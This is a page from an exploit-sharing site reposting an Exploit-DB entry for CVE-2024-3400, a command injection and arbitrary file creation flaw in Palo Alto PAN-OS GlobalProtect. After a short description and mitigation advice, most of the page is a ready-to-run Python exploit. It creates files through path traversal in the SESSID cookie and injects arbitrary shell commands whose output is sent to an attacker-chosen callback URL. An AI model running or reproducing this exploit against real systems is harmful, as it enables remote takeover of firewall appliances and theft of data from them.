Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Palo Alto PAN-OS Command Injection and Arbitrary File Creation - exploit.company
header-logo
Suggest Exploit
vendor:
PAN-OS
by:
Kr0ff
6.1
CVSS
HIGH
Command Injection and Arbitrary File Creation
78
CWE
Product Name: PAN-OS
Affected Version From: PAN-OS 10.2 < 10.2.9-h1
Affected Version To: PAN-OS 11.1 < 11.1.2-h3
Patch Exists: NO
Related CWE: CVE-2024-3400
CPE: o:paloaltonetworks:pan_os:10.2.9-h1
Metasploit:
Platforms Tested: Debian
2024

Palo Alto PAN-OS Command Injection and Arbitrary File Creation

The Palo Alto PAN-OS versions prior to 11.1.2-h3 are vulnerable to command injection and arbitrary file creation. An attacker can exploit this vulnerability to execute arbitrary commands and create files on the target system. This vulnerability has been assigned the CVE ID CVE-2024-3400.

Mitigation:

Update to version 11.1.2-h3 or later to mitigate this vulnerability. Avoid exposing vulnerable systems to untrusted networks.
Source

Exploit-DB raw data:

# Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
# Software Link: -
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 
#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis 
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

def check_vuln(target: str, file: str) -> bool:
    ret = False
    
    uri = "/ssl-vpn/hipreport.esp"
    
    s = requests.Session()
    r = ""
    
    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    } 
    
    headers_noCookie = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }
    
    if not "http://" or not "https://" in target:
        target = "http://" + target   
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if r.status_code == 200:
        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        return ret

    return ret
    
    

def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    ret = False
    p = ""

    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"

    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"

            } 

    s = requests.Session()
    r = ""
    
    if not "http://" or not "https://" in target:
        target = "http://" + target   
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if not "Success" in r.text:
        return ret

    else:
        ret = True

    return ret

#Initilize parser for arguments
def argparser(selection=None):
    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
    
    subparser = parser.add_subparsers( help="Available modules", dest="module")
    
    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
    #---------------------------------------
    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )

    args = parser.parse_args(selection)
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
    
    if args.module == "exploit":    
        cmdexec(args.target, args.callbackurl, args.payload)

    if args.module == "check":
        check_vuln(args.target, args.filename)

if __name__ == "__main__":
    argparser()
    print("Finished !")